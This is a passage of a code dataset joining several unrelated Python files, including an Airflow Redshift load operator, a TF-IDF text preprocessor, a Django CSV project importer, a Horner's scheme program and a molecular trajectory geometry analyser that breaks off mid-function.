models.multi_cnn(x_3d, is_training)\n","sub_path":"src/btc_models.py","file_name":"btc_models.py","file_ext":"py","file_size_in_byte":53170,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"521876430","text":"from airflow.hooks.postgres_hook import PostgresHook\nfrom airflow.models import BaseOperator\nfrom airflow.utils.decorators import apply_defaults\n\nclass LoadFactOperator(BaseOperator):\n\n ui_color = '#F98866'\n \n load_sql = \"INSERT INTO {} {}\"\n \n @apply_defaults\n def __init__(self,\n # Define your operators params (with defaults) here\n # Example:\n redshift_conn_id = \"\",\n table=\"\",\n select_sql_stmt=\"\",\n *args, **kwargs):\n\n super(LoadFactOperator, self).__init__(*args, **kwargs)\n \n self.redshift_conn_id = redshift_conn_id\n self.table = table\n self.select_sql_stmt = select_sql_stmt\n \n \n\n def execute(self, context):\n redshift = PostgresHook(postgres_conn_id=self.redshift_conn_id)\n \n self.log.info(\"LoadFactOperator: execute sql query\")\n load_facts_sql = LoadFactOperator.load_sql.format(self.table, self.select_sql_stmt)\n redshift.run(load_facts_sql)\n","sub_path":"airflow/plugins/operators/load_fact.py","file_name":"load_fact.py","file_ext":"py","file_size_in_byte":1049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"89153214","text":"import numpy as np\r\nimport nltk\r\nimport re\r\nimport pandas as pd\r\nimport sklearn\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn.preprocessing import 
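# How the LoadFactOperator defined in the load_fact.py record above would typically be
# wired into a DAG -- a hypothetical sketch: the dag id, task id, connection id, table
# and SQL below are invented for illustration:
from datetime import datetime
from airflow import DAG

with DAG("sparkify_etl", start_date=datetime(2021, 1, 1), schedule_interval=None) as dag:
    load_songplays = LoadFactOperator(
        task_id="load_songplays_fact",
        redshift_conn_id="redshift",
        table="songplays",
        select_sql_stmt="SELECT ... FROM staging_events",  # placeholder SQL
    )
# The operator then renders load_sql as "INSERT INTO songplays SELECT ..." and runs it
# through the Redshift PostgresHook.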
StandardScaler\r\nfrom sklearn.decomposition import PCA\r\nfrom nltk.tokenize import word_tokenize\r\nfrom nltk.corpus import wordnet\r\nfrom nltk.corpus import stopwords\r\nfrom nltk.stem import WordNetLemmatizer\r\n\r\n\r\nclass ScrapedArticles():\r\n def __init__(self, articles_list):\r\n self.database = articles_list\r\n self.bagsOfWords = []\r\n self.wordFreq = [{}]\r\n\r\n def clean_database(self):\r\n self.database.remove('')\r\n #remove non-letters\r\n for i in range(0, len(self.database)):\r\n exclusion_list = ['[^a-zA-Z]', 'rt', 'http', 'co', 'RT']\r\n exclusions = '|'.join(exclusion_list)\r\n self.database[i] = re.sub(exclusions, ' ', self.database[i])\r\n self.database[i] = self.database[i].lower()\r\n\r\n #create a bag of words\r\n for i in range(0, len(self.database)):\r\n self.bagsOfWords.append(\r\n word_tokenize(self.database[i])\r\n )\r\n bag = [x for x in self.bagsOfWords[i] if ((not (x in stopwords.words('english'))) and x != \"\") ]\r\n self.bagsOfWords[i] = bag\r\n\r\n #lemmatize to keep 'root' of words\r\n lemmatizer = WordNetLemmatizer()\r\n for s in range(0, len(self.bagsOfWords)):\r\n for i in range(0, len(self.bagsOfWords[s])):\r\n word = self.bagsOfWords[s][i]\r\n self.bagsOfWords[s][i] = lemmatizer.lemmatize(word, self.get_wordnet_pos(word))\r\n\r\n\r\n def find_unique_words(self):\r\n\r\n #find all the words used in the articles and puts it in list\r\n unique_words = []\r\n for i in self.bagsOfWords:\r\n unique_words = set(unique_words).union(set(i))\r\n\r\n\r\n #count all the times a word appears in a doccument\r\n word_count = []\r\n for s in range (0, len(self.bagsOfWords)):\r\n word_count.append(dict.fromkeys(unique_words, 0))\r\n for i in self.bagsOfWords[s]:\r\n word_count[s][i] += 1\r\n self.wordFreq = word_count\r\n\r\n #apply sqrt to reduce the influence of high word counts\r\n for s in range(0, len(self.wordFreq)):\r\n for word in self.wordFreq[s]:\r\n count = self.wordFreq[s][word]\r\n self.wordFreq[s][word] = np.sqrt(count)\r\n\r\n def computeTF(self) -> [{}]:\r\n tfDict = []\r\n for i in range (0, len(self.wordFreq)):\r\n tfDict.append({})\r\n for word, count in self.wordFreq[i].items():\r\n tfDict[i][word] = count/float(len(self.bagsOfWords[i]))\r\n return tfDict\r\n\r\n def computeIDF(self) -> [{}]:\r\n idf = {}\r\n x = 0\r\n for word in self.wordFreq[0]:\r\n for i in range(0, len(self.wordFreq)):\r\n if (self.wordFreq[i].get(word, 0) != 0):\r\n idf[word] = idf.get(word, 0) + 1\r\n idf[word] = len(self.bagsOfWords)/idf.get(word, 0)\r\n x += 1\r\n return idf\r\n\r\n def computeTF_IDF(self):\r\n tf = self.computeTF()\r\n idf = self.computeIDF()\r\n\r\n tf_idf = []\r\n for i in range(0, len(self.wordFreq)):\r\n tf_idf.append({})\r\n for word in self.wordFreq[0]:\r\n tf_idf[i][word] = tf[i].get(word, 0)*idf.get(word, 0)\r\n return tf_idf\r\n\r\n def dimension_reduction(self, df):\r\n df = StandardScaler().fit_transform(df)\r\n pca = PCA(n_components=5)\r\n\r\n principalComponents = pca.fit_transform(df)\r\n principalDf = pd.DataFrame(data=principalComponents\r\n , columns=['principal component 1', 'principal component 2', 'principal component 3', 'principal component 4', 'principal component 5'])\r\n return principalDf\r\n\r\n def get_wordnet_pos(self, word):\r\n \"\"\"Map POS tag to first character lemmatize() accepts\"\"\"\r\n tag = nltk.pos_tag([word])[0][1][0].upper()\r\n tag_dict = {\"J\": wordnet.ADJ,\r\n \"N\": wordnet.NOUN,\r\n \"V\": wordnet.VERB,\r\n \"R\": wordnet.ADV}\r\n\r\n return tag_dict.get(tag, 
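# Note on the TF-IDF code above: computeIDF uses the raw ratio N/df, which gives idf = 1
# for a term appearing in every document and grows without log damping. The more common
# smoothed log variant, as a standalone sketch (not the author's method):
import math

def idf_log(n_docs, doc_freq):
    # sklearn-style smooth idf: log((1 + N) / (1 + df)) + 1; never zero, never divides by zero
    return math.log((1 + n_docs) / (1 + doc_freq)) + 1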
wordnet.NOUN)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"Article_Preprocessing.py","file_name":"Article_Preprocessing.py","file_ext":"py","file_size_in_byte":4234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"135377160","text":"# EvilPlot\n# Copyright 2008 Brigham Young University\n#\n# This file is part of EvilPlot.\n#\n# EvilPlot is free software: you can redistribute it and/or modify it under\n# the terms of the GNU General Public License as published by the Free\n# Software Foundation, either version 3 of the License, or (at your option)\n# any later version.\n#\n# EvilPlot is distributed in the hope that it will be useful, but WITHOUT ANY\n# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS\n# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more\n# details.\n#\n# You should have received a copy of the GNU General Public License along with\n# EvilPlot. If not, see <http://www.gnu.org/licenses/>.\n#\n# Inquiries regarding any further use of the Materials contained on this site,\n# please contact the Copyright Licensing Office, Brigham Young University,\n# 3760 HBLL, Provo, UT 84602, (801) 422-9339 or 422-3821, e-mail\n# copyright@byu.edu.\n\n\"\"\"param.py: Create objects with inheritable keyword parameters/attributes\n\nAnything that subclasses ParamObj will be an object for which _params is\na special directory of Param objects.\n\"\"\"\n\nfrom six import with_metaclass\n\n\n#TODO: make it so that you can put None in your dictionary to cancel out\n# a parameter defined in one of your superclasses.\n\nclass ParamError(Exception):\n def __init__(self, clsname, paramname):\n self.clsname = clsname\n self.paramname = paramname\n\n def __str__(self):\n return 'Class %s has no parameter \"%s\"' % (self.clsname, self.paramname)\n\n\nclass Param(object):\n \"\"\"A Parameter with name, default value, and documentation.\n\n A list of Params is used by a class of type ParamMeta.\n \"\"\"\n def __init__(self, default=None, doc=None):\n self.default = default\n self.doc = doc\n\n\nclass ParamMeta(type):\n \"\"\"A metaclass that lets you define params.\n\n When creating a new class of type ParamMeta, add a dictionary named\n params into the class namespace. Add Param objects to the dictionary\n with the key being the name of the parameter. Now, each object of the\n class will have an attribute with the appropriate name. 
The value will\n default to the default value in the Param object, but it can be\n overridden by name in __init__.\n\n Rather than using ParamMeta directly, we recommend that you subclass\n ParamObj, which will allow you to override __init__ as long as you\n call super's __init__.\n \"\"\"\n def __new__(cls, classname, bases, classdict):\n\n # Make sure we have a params dict in classdict.\n if '_params' not in classdict:\n classdict['_params'] = {}\n params = classdict['_params']\n\n # Collect the params from each of the parent classes.\n for base in bases:\n try:\n baseparams = base._params\n except AttributeError:\n # This base class doesn't have a params list.\n continue\n\n for param_name in baseparams:\n if param_name in params:\n if params[param_name].doc is None:\n params[param_name].doc = baseparams[param_name].doc\n else:\n params[param_name] = baseparams[param_name]\n\n # Update documentation based on our parameters\n if '__doc__' not in classdict:\n classdict['__doc__'] = '%s -- Class using Params' % classname\n docs = [('%s: %s (default=%s)' % (param_name,\n params[param_name].doc, params[param_name].default))\n for param_name in params]\n docs.sort()\n classdict['__doc__'] = classdict['__doc__'] + \\\n '\\n '.join(['\\n%s Parameters:' % classname] + docs)\n\n # Write a new __init__ for our classes. If they write their own\n # __init__, we refuse to overwrite it.\n if '__init__' not in classdict:\n def __init__(self, **kwds):\n for key in kwds:\n if key not in self._params:\n raise ParamError(self.__class__.__name__, key)\n for param_name in self._params:\n if param_name in kwds:\n value = kwds[param_name]\n else:\n value = self._params[param_name].default\n setattr(self, param_name, value)\n classdict['__init__'] = __init__\n\n # Create and return the new class\n return type.__new__(cls, classname, bases, classdict)\n\n\nclass ParamObj(with_metaclass(ParamMeta)):\n \"\"\"An object that treats \"_params\" specially.\n\n An object of class ParamObj may contain a dictionary named _params. This\n dictionary should have string keys and Param values. For each entry in\n the dictionary, an object attribute is created with the same name as the\n key, and the value and documentation of the attribute are given by the\n arguments to the Param. 
Inheritance of _params works right.\n\n Example:\n\n class Rabbit(ParamObj):\n \\\"\\\"\\\"A small rodent, very similar to a hare, which feeds on grass\n and burrows in the earth.\n \\\"\\\"\\\"\n _params = dict(weight=Param(default=42, doc='Body Weight'))\n\n def __init__(self, **kwds):\n ParamObj.__init__(self, **kwds)\n\n >>> m = Rabbit()\n >>> m.__doc__\n 'A small rodent, very similar to a hare, which feeds on grass\n and burrows in the earth.\n\n weight: Body Weight (default=42)'\n >>> m.weight\n 42\n >>> m = Rabbit(weight=12)\n >>> m.weight\n 12\n \"\"\"\n\n\n__all__ = ['ParamObj', 'Param']\n\n# vim: et sw=4 sts=4\n","sub_path":"evilplot/param.py","file_name":"param.py","file_ext":"py","file_size_in_byte":5628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"}
{"seq_id":"337086840","text":"import csv\nimport datetime\n\nfrom django.core.management.base import BaseCommand\nfrom django.db import transaction\n\nfrom project.models import Project\nfrom project.models import ProjectCategory\nfrom project.models import ProjectFundingSource\nfrom project.models import ProjectUserMembership\nfrom users.models import Profile\n\n\nclass Command(BaseCommand):\n help = 'Import HPCW projects from a csv file.'\n\n def add_arguments(self, parser):\n parser.add_argument('csv_filename')\n\n def handle(self, *args, **options):\n try:\n filename = options['csv_filename']\n with open(filename, newline='', encoding='ISO-8859-1') as csvfile:\n next(csvfile)\n reader = csv.reader(csvfile, delimiter=',')\n self.parse_projects(reader)\n except FileNotFoundError:\n self.stdout.write(self.style.ERROR('Unable to open ' + filename))\n\n def parse_projects(self, reader):\n for row in reader:\n try:\n with transaction.atomic():\n self.parse_project(row)\n self.parse_project_membership(row)\n except Exception as e:\n self.stdout.write(self.style.ERROR(str(e)))\n\n def parse_project(self, data):\n _, created = Project.objects.get_or_create(\n legacy_hpcw_id=data[0],\n title='Untitled' if data[2] == '' else data[2],\n description='',\n institution_reference='',\n pi=data[5].title(),\n tech_lead=Profile.objects.get(hpcw_username__iexact=data[6].lower()).user,\n category=ProjectCategory.objects.get(name='Standard Projects - Internally Funded'),\n funding_source=ProjectFundingSource.objects.get(name='N/A'),\n start_date=datetime.datetime.strptime(data[1], '%d/%m/%Y'),\n end_date=datetime.datetime.strptime(data[1], '%d/%m/%Y'),\n allocation_cputime=0,\n allocation_memory=0,\n allocation_storage_home=0,\n allocation_storage_scratch=0,\n status=Project.AWAITING_APPROVAL,\n notes='Imported HPCW Project.',\n )\n if created:\n message = 'Successfully created project {code}.'.format(code=data[0])\n self.stdout.write(self.style.SUCCESS(message))\n else:\n message = 'Project {code} already exists.'.format(code=data[0])\n self.stdout.write(self.style.SUCCESS(message))\n\n def parse_project_membership(self, data):\n project_member_col_index = 8\n while (data[project_member_col_index].strip()):\n user = Profile.objects.get(hpcw_username__iexact=data[project_member_col_index].lower()).user\n _, created = ProjectUserMembership.objects.get_or_create(\n project=Project.objects.get(legacy_hpcw_id=data[0]),\n user=user,\n status=ProjectUserMembership.AWAITING_AUTHORISATION,\n date_joined=datetime.datetime.now(),\n )\n if created:\n message = 'Successfully created project user membership for {hpcw_username} ({user}).'.format(\n hpcw_username=user.profile.hpcw_username,\n user=user,\n )\n 
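# A quick demonstration of the ParamObj/Param machinery from the evilplot/param.py
# record above (class and parameter names invented for illustration):
class Cat(ParamObj):
    _params = dict(lives=Param(default=9, doc='Remaining lives'))

c = Cat()          # c.lives == 9 (default from the Param)
c = Cat(lives=3)   # c.lives == 3 (overridden by keyword)
# Cat(color='black') would raise ParamError: Class Cat has no parameter "color"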
self.stdout.write(self.style.SUCCESS(message))\n else:\n message = 'Project user membership for {hpcw_username} ({user}) already exists.'.format(\n hpcw_username=user.profile.hpcw_username,\n user=user,\n )\n self.stdout.write(self.style.SUCCESS(message))\n project_member_col_index += 1\n","sub_path":"project/management/commands/add_hpcw_projects.py","file_name":"add_hpcw_projects.py","file_ext":"py","file_size_in_byte":3665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"}
{"seq_id":"398714613","text":"import sys\r\nimport pandas as pd\r\n\r\ninputFile=sys.argv[1]\r\noutFile=sys.argv[2]\r\nsizeFile=sys.argv[3]\r\n\r\ndf = pd.read_csv(inputFile,sep=\"\\t\",header=None)\r\ndf[1] = df[1].astype(int)\r\ndf[2] = df[2].astype(int)\r\ndf[3] = df[0]+\":\"+df[1].astype(str)+\"-\"+df[2].astype(str)\r\ndf[4] = df[2]-df[1]\r\ndf[5] = \"+\"\r\n\r\ndf[[0,1,2,3,4,5]].to_csv(outFile,sep=\"\\t\",header=False,index=False)\r\n\r\ndf[[3,4]].to_csv(sizeFile,sep=\"\\t\",header=False,index=False)\r\n\r\n","sub_path":"share/misc/get_uniform_bed.py","file_name":"get_uniform_bed.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"}
{"seq_id":"219389410","text":"import numpy as np\nfrom numpy.core.multiarray import datetime_as_string\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport joblib\nimport sys\nimport matplotlib.dates as mdates\nimport datetime\nfrom dateutil.relativedelta import relativedelta\n\n# the project name is given as a command-line argument\nif len(sys.argv) != 2:\n print(\"Wrong number of arguments\")\n sys.exit()\n\nproject = sys.argv[1]\n\na = joblib.load(f\"scripts/evaluation_accuracy/result/{project}.pkl\")\nb = joblib.load(f\"scripts/evaluation_accuracy/result/{project}_2.pkl\")\nprint(a)\nprint(b)\nnot_use_datetime = a[\"hyouka_1\"]\nuse_datetime = b[\"hyouka_2\"]\n\nnum_data_n = len(not_use_datetime)\nnum_data_u = len(use_datetime)\n\ndate_n = not_use_datetime.index.values\ndate_u = use_datetime.index.values\n\nans_n = [0] * num_data_n\nans_u = [0] * num_data_u\nx = 0\nfor j in range(num_data_u):\n x += use_datetime.iloc[j]\n ans_u[j] = x / (j+1)\n\nx = 0\nfor j in range(num_data_n):\n x += not_use_datetime.iloc[j]\n ans_n[j] = x / (j+1)\n\ndate_n = pd.DataFrame(date_n)\ndate_u = pd.DataFrame(date_u)\nans_n = pd.DataFrame(ans_n)\nans_u = pd.DataFrame(ans_u)\n\nans_n[\"datetime\"] = date_n\nans_u[\"datetime\"] = date_u\n\nans_n.set_index(\"datetime\",inplace=True)\nans_u.set_index(\"datetime\",inplace=True)\nans_n = ans_n.resample('M', label='left').mean().ffill()\nans_u = ans_u.resample('M', label='left').mean().ffill()\ndate_n = ans_n.index.values\ndate_u = ans_u.index.values\n\nif len(ans_n) < len(ans_u):\n date = ans_n.tail(1).index.date\n date = date + relativedelta(months=1)\n date = date[0].strftime(\"%Y-%m-%d\")\n date = datetime.datetime.strptime(date, '%Y-%m-%d')\n val = ans_n.tail(1)[0][0]\n df_tmp = pd.Series([val], index=[date])\n ans_n = pd.concat([ans_n, df_tmp])\n pd.to_datetime(date)\n date = np.datetime64(date)\n date_n = np.append(date_n, date)\n\nprint(ans_n)\nprint(date_n)\n\nsxmin='2011-03-01'\n#sxmin='2010-08-01'\nsxmax='2016-10-31'\nxmin = datetime.datetime.strptime(sxmin, '%Y-%m-%d')\nxmax = datetime.datetime.strptime(sxmax, '%Y-%m-%d')\n#plt.xlim(xmin, xmax)\nplt.ylim(-0.05, 1.05)\n\nplt.plot(date_n, ans_n, marker=\"o\", label=\"without considering the time series\")\nplt.plot(date_u, ans_u, marker=\"x\", linestyle=\"dashed\", label=\"considering the time series\")\nplt.xticks(fontsize=16)\nplt.yticks(fontsize=16)\nplt.gca().xaxis.set_major_formatter(mdates.DateFormatter('%Y-%m'))\nplt.gca().xaxis.set_major_locator(mdates.MonthLocator(interval=6))\nplt.gca().xaxis.set_minor_locator(mdates.MonthLocator(interval=1))\nplt.gca().tick_params(width = 2, length = 10)\nplt.legend(fontsize=20)\n\n# y-axis label\nplt.xticks(rotation=90)\nplt.ylabel(\"Accuracy\", fontsize=16)\n\nplt.grid(which='major',color='black',linestyle='--')\n\n# show the plot\nplt.show()\n","sub_path":"scripts/evaluation_accuracy/pickle_plot.py","file_name":"pickle_plot.py","file_ext":"py","file_size_in_byte":2709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"}
{"seq_id":"256768483","text":"\"\"\"Horner's scheme\"\"\"\n\"\"\"Lab test:\nHorner's scheme:\nn=5\nP(x)=2x**5-3x**4+4*x+7\ndivided by (x-2)\nQuotient: 2x**4+x**3+2x**2+4x+12\nRemainder: 31\"\"\"\nfrom numpy import zeros\nn = int(input('n='))\na = zeros((n+1), dtype=int)\nb = zeros((n+1), dtype=int)\nfor i in range(0,n+1):\n print('a[', i, ']=')\n a[i] = int(input())\nc=int(input('c='))\nb[0]=a[0]\nfor i in range(1,n+1):\n b[i] = c*b[i-1]+a[i]\nprint(\"The quotient coefficients are: \", end='')\nfor i in range(0,n):\n print(b[i], end=' ')\nprint(\"\\nThe remainder is: \", b[n])","sub_path":"generate_nr_from_4/schema_lui_horner.py","file_name":"schema_lui_horner.py","file_ext":"py","file_size_in_byte":501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"}
{"seq_id":"202749765","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Nov 15 03:43:52 2014\n\n@author: GEOS_SS1\n\"\"\"\n\ndef long_substr(data):\n substr = ''\n if len(data) > 1 and len(data[0]) > 0:\n for i in range(len(data[0])):\n for j in range(len(data[0])-i+1):\n if j > len(substr) and is_substr(data[0][i:i+j], data):\n substr = data[0][i:i+j]\n return substr\n\ndef is_substr(find, data):\n if len(data) < 1 and len(find) < 1:\n return False\n for i in range(len(data)):\n if find not in data[i]:\n return False\n return True\n \nprint(long_substr(['Oh, hello, my friend.',\n 'I prefer Jelly Belly beans.',\n 'When hell freezes 
over!']))\n","sub_path":"Scripts/randomekek.py","file_name":"randomekek.py","file_ext":"py","file_size_in_byte":735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"}
{"seq_id":"164289316","text":"#!/usr/bin/env python\n\n''' ANALYZE MOVIES\nworking in anaconda WITH python 3.6.5\nPROGRAM DOES GEOMETRY ANALYSIS OF MOVIE-LIKE (in XYZ format) FILES\n\nFOR ANY MOLECULAR SYSTEM ONLY THE /natoms & molecule/ VARIABLES NEED TO BE MODIFIED IN FUNCTION input_check() TO GET DISTANCE MATRICES\n\n1/ EACH FILE IS CHECKED IF IT IS COMPLETE (NUMBER OF LINES MUST MATCH THE NATOMS+2 CRITERION) :: def geoms_check\n2/ GO THROUGH EACH MOVIE ONE GEOMETRY AT A TIME -> CREATE DISTANCE MATRIX // should be fast according to walltime measurements\n3/ PROCESS DISTANCE MATRIX ACCORDING TO THE PARTICULAR SYSTEM (ANALYSIS IS ALWAYS DIFFERENT AND DEPENDS ON THE POSSIBLE REACTION CHANNELS) \n\n- TO DO - CREATE A CLUSTERING ALGORITHM INDEPENDENT OF THE SYSTEM WHICH WILL FIND MOLECULAR FRAGMENTS/SEPARATE MOLECULES \n- IF DISTANCE MATRICES ARE STORED FOR FUTURE USE, JAGGED MATRICES MIGHT BE BETTER AND SAVE SOME MEMORY INSTEAD OF USING THE FULL NATOMS X NATOMS DISTANCE MATRIX (especially for dense, low-timestep simulations)\n'''\nimport math\nimport sys\nimport numpy as np\nimport random\nimport time\nimport os\nimport subprocess\nimport string\nimport itertools\nimport csv\n##############################################\n##############################################\n##############################################\n\nnp.set_printoptions(linewidth = 150) # avoid text wrapping in console when printing np.array for checks\n\ndef input_check():\n global molecule,natoms,results_file # same number and molecule for all movies and geoms\n if len(sys.argv) < 3:\n print(\"Error: not enough parameters.\\nUsage: python \",sys.argv[0],\" th/tm/molecule movie.xyz movie2.xyz....\")\n sys.exit(1)\n\n movies = []\n lines = []\n geoms = []\n molecule = sys.argv[1] # TMTH or THMS\n movs = sys.argv[3:] # list of movies to process\n results_file = sys.argv[2] # file used for saving final data\n \n ##### MODIFY HERE FOR A SPECIFIC MOLECULE: #####\n if molecule == \"tm\":\n lines_per_mol = 17\n natoms = 15\n elif molecule == \"th\":\n lines_per_mol = 13\n natoms = 11\n else: sys.exit(\"Wrong system (tm/th)\")\n \n print('Number of movie files requested:', len(sys.argv)-2)\n\n for mov in movs:\n cwd = os.getcwd()\n movie_path = os.path.join(cwd,mov)\n\n if os.path.isfile(movie_path):\n movies.append(movie_path)\n gc = geoms_check(movies[-1],lines_per_mol) #no need to specify order\n #print(gc)\n lines.append(gc[0])\n geoms.append(gc[1])\n print(mov,' OK, Nlines: ', lines[-1], 'Ngeoms: ', geoms[-1])\n else:\n print(mov ,' File does NOT exist.') \n print('File check finished.',\"\\n\",'##########FILES:############################')\n return molecule,movies,geoms\n#end input check\n\ndef geoms_check(mov,lines_per_mol): # fast number-of-lines reader exploiting a limited buffer \n lines = 0\n geoms = 0\n buf_size = 1024 * 1024\n with open(mov,'r') as f:\n read_f = f.read\n buf = read_f(buf_size)\n while buf:\n lines += buf.count('\\n') \n # '\\n' is left at the end of the string, and is only omitted on the last line of the file\n buf = read_f(buf_size)\n f.close()\n if not (lines % lines_per_mol): geoms = lines / lines_per_mol # 0 is FALSE\n else:\n print('Nlines is not divisible by l_p_m: ',lines, lines_per_mol, mov)\n print('Check if there is an empty line at the end of the file \\n')\n sys.exit(1)\n return lines,geoms\n\n
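# The distance_matrix routine further below fills an upper-triangular (natoms-1, natoms)
# array with a double Python loop. An equivalent vectorized NumPy sketch, for comparison
# only (it returns the full symmetric natoms x natoms matrix with the same pairwise values):
import numpy as np

def distance_matrix_vectorized(xyz):
    # d[i, j] = ||xyz[i] - xyz[j]|| via broadcasting; xyz has shape (natoms, 3)
    diff = xyz[:, None, :] - xyz[None, :, :]
    return np.sqrt((diff ** 2).sum(axis=-1))

# MAIN ROUTINE TO GO THROUGH 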
EACH MOVIE - READ XYZ, CALCULATE DISTANCE, ANALYZE GEOMETRY\ndef process_movies(movies,geoms):\n \"\"\"\n Expecting .xyz file \n first line = natoms\n second line = comment + time/timestep information, might require change in timestep assingment split index []\n \"\"\"\n analyzed_geoms = np.array([[0, 0]]) # main array with time and reaction channel for each geometry\n for m,mov in enumerate(movies): # iterate over movies\n print(\"Processing \",m+1,\"movie: \",mov)\n with open(mov,'r') as f:\n \n for g in range(1,int(geoms[m])+1): # iterate over geoms in each mov file, first index is inclusive, last exclusive!\n #natoms = int(f.readline())\n atoms = f.readline() # atoms\n timestep = f.readline().split()[2] # comment + time \n if g == 1:\n xyz = np.zeros(shape=(natoms,3))\n if os.path.isfile(os.path.join(os.getcwd(),'dist_mat.dat')): os.remove('dist_mat.dat') \n #print('geometry: ',g)\n\n for at in range(0,natoms): # iterate over atoms in each geometry\n line = f.readline().split()\n xyz[at]=[float(line[1]),float(line[2]),float(line[3])]\n #print(time,\"\\n\",xyz)\n \n dist_mat = distance_matrix(xyz) #cal dist matrix\n \n ##### MODIFIE HERE FOR SPECIFIC MOLECULE: #####\n if molecule == \"tm\" : channel = analyze_tm(dist_mat)[0] # analyze geometry\n elif molecule == \"th\" : channel = analyze_th(dist_mat)[0] \n \n analyzed_geoms = np.append(analyzed_geoms, [[int(timestep),int(channel)]], axis = 0) # save analyzed data for statistics\n f.close()\n \n return(analyzed_geoms)\n \n# DISTANCE MATRIX\ndef distance_matrix(xyz): \n# all combinations of pairs: list(itertools.combinations(range(natoms),2)) - yet still need to loop over two-indices to call dist func brute force number of combinations len(<-)\n# with open('dist_mat.dat','a') as file_dist_save: # save dist_mat in file for check if needed\n# np.savetxt(file_dist_save, dist_mat, newline='\\n', fmt='%.8e',footer =\" \")\n dist_mat = np.zeros(shape=(natoms-1,natoms)) # create empty dist matrix - matrix is not stored for future\n for k in range(0,natoms):\n for l in range(k+1,natoms):\n v1, v2 = np.array(xyz[k]), np.array(xyz[l])\n dist = [(a - b)**2 for a, b in zip(v1, v2)]\n dist_mat[k][l] = math.sqrt(sum(dist))\n # print(v1,v2,l,k) # combination check\n\n return dist_mat\n\n###############################################\n#ConstantS - CRITERIA FOR GEOMETRY ANALYSIS \nH_diss_dist = 3.000 \nOO_bond_dist = 4.500\nCH_bond_dist = 3.000\nHH_bond_dist = 1.500 \nSnH_bond_dist = 3.000\nSnX_bond_dist = 5.000 # x = C or O \n###############################################\n\n# GEOMETRY ANALYSIS \ndef analyze_th(dist_mat):\n#print(molecule,natoms)\n channel = 0\n me_diss = 0\n oh_diss = 0\n h_diss = 0 # number of dissciated hydrogen atom\n h_diss_index = [] # which H atoms are dissociated\n h_bonds = [] # list of X - H bonds to test for shortest distance \n h_ats_on_heavies = [0,0,0,0,0] # how many H atoms are on each heavy atom\n \n for hydrogen_atom in range(5,natoms):\n for heavy_atom in range(0,5): # last index excluded, upper diagonal l matrix, first index < second one\n h_bonds.append(dist_mat[heavy_atom][hydrogen_atom])\n #print(hydrogen_atom,heavy_atom,\" : \",dist_mat[heavy_atom][hydrogen_atom])\n \n shortest_bond = min((j,i) for i,j in enumerate(h_bonds)) # find the smallest bod and print heavy atom related to it, enumerate over heavy atoms 0 - 5\n h_bonds.clear() # dont need anymore \n \n #1a) how many hydrogens are on each heavy atom\n if shortest_bond[0] < H_diss_dist: \n h_ats_on_heavies[shortest_bond[1]] = 
h_ats_on_heavies[shortest_bond[1]] + 1\n else : \n h_diss = h_diss + 1 \n h_diss_index.append(shortest_bond[1])\n if h_diss >= 2: \n print(\"#### 2 diss H CAREFULL\")\n # print(\"O,Sn,O,C,O: \",h_ats_on_heavies) \n \"\"\"\n atom order:\n 0 O Sn-C = 1,2\n 1 Sn \n 2 O Sn-O = 1,2\n 3 C Sn-C = 1,3\n 4 O Sn-O = 1,4\n 5-11 H\n\n Channels:\n 0 nothing happened\n 1 1 Methyl diss\n 2 1 OH diss \n 3 2 OH diss \n 4 OH + Methyl diss\n 5 Methyl + 2 or more OH diss\n 6 H diss + komplex\n 7 H diss (komplex + O + H)\n 8 H diss (komplex + CH2 + H)\n 9 3 OH diss\n \"\"\"\n if h_ats_on_heavies[1] > 0: exit(\"########## H transfer to Sn, check!!!!! #####\")\n \n if dist_mat[1][3] > SnX_bond_dist: \n me_diss = me_diss + 1\n \n if dist_mat[0][1] > SnX_bond_dist: \n oh_diss = oh_diss + 1\n if (me_diss == 0 and h_ats_on_heavies[0] == 0) : channel = 7 \n \n if dist_mat[1][2] > SnX_bond_dist: \n oh_diss = oh_diss + 1 \n if (me_diss == 0 and h_ats_on_heavies[2] == 0) : channel = 7 \n \n if dist_mat[1][4] > SnX_bond_dist: \n oh_diss = oh_diss + 1\n if (me_diss == 0 and h_ats_on_heavies[4] == 0) : channel = 7 \n \n if h_diss == 0:\n if me_diss == 0: \n if oh_diss == 1: channel = 2 \n if oh_diss == 2: channel = 3\n if oh_diss == 3: channel = 9\n elif me_diss == 1:\n if oh_diss == 0: channel = 1 \n elif oh_diss == 1: channel = 4 \n elif oh_diss == 2: channel = 5 \n elif oh_diss == 3: channel = 5\n elif h_diss == 1:\n if (me_diss == 0 and oh_diss == 0): channel = 6\n if (me_diss == 1 and oh_diss == 0 and h_ats_on_heavies[3] == 2) : channel = 8 #H from CH3 group \n # print(' channel,h_diss,me_diss,oh_diss,sum(h_ats_on_heavies:',channel,h_diss,me_diss,oh_diss,sum(h_ats_on_heavies)) \n # print(\"----------------------------------\")\n return channel,h_diss\n\n# GEOMETRY ANALYSIS \ndef analyze_tm(dist_mat):\n \"\"\"\n atom order:\n 0 Sn \n 1 C Sn-C = 1,2\n 2 C Sn-C = 1,3\n 3 C Sn-C = 1,4\n 4 O Sn-O = 1,5\n 5-14 H\n \"\"\"\n#1) WHERE ARE HYDROGEN ATOMS\n\n channel = 0\n h_diss = 0 # number of dissciated hydrogen atom\n h_diss_index = [] # which H atoms are dissociated\n h_bonds = [] # list of X - H bonds to test for shortest distance \n h_ats_on_heavies = [0,0,0,0,0] # how many H atoms are on each heavy atom\n \n for hydrogen_atom in range(5,natoms):\n for heavy_atom in 